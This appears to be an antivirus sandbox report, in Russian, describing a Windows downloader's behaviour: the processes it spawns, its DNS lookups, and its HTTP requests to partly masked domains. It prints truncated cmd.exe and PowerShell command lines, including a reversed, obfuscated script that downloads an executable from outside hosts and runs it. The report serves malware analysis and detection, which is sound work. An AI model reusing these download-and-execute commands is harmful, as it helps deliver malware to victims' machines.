Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V/C"set mJWx=;'LUZ'=frG$}}{hctac};kaerb;'Hvq'=wWi$;ZaB$ metI-ekovnI;'RwG'=jEq$;)ZaB$ ,jim$(eliFdaolnwoD.kLW${yrt{)rwL$ ni jim$(hcaerof;'exe.'+shL$+'\'+pmet:vne$=ZaB$;'Srn'=AAt$;'253' = shL$;'z...
Сетевая активность
Подключается к
- 'ki###arch.com':80
- 'ki###arch.com':443
- 'sh######structions.co.in':80
TCP
Запросы HTTP GET
- http://ki###arch.com/3f11kFZb
Другие
- 'ki###arch.com':443
UDP
- DNS ASK ki###arch.com
- DNS ASK eg####.tk-studio.ru
- DNS ASK e-#####.billioncart.in
- DNS ASK sh######structions.co.in
- DNS ASK bo##ch.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"set mJWx=;'LUZ'=frG$}}{hctac};kaerb;'Hvq'=wWi$;ZaB$ metI-ekovnI;'RwG'=jEq$;)ZaB$ ,jim$(eliFdaolnwoD.kLW${yrt{)rwL$ ni jim$(hcaerof;'exe.'+shL$+'\'+pmet:vne$=ZaB$;'Srn'=AAt$;'253' = shL$;'z...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" echo powershell $oYz='TDE';$WLk=new-object Net.WebClient;$Lwr='http://ki###arch.com/3f11kFZb@http://egtest.tk-studio.ru/XXeadeuKwQ@http://e-video.billioncart.in/7VIcOtMZ8H@http://shre...
- '<SYSTEM32>\cmd.exe' /S /D /c" FOR /F "tokens=10 delims=Vtk.G\" %l IN ('ftype^|find "sol"') DO %l -"
- '<SYSTEM32>\cmd.exe' /c ftype|find "sol"
- '<SYSTEM32>\cmd.exe' /S /D /c" ftype"
- '<SYSTEM32>\find.exe' "sol"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =TDE
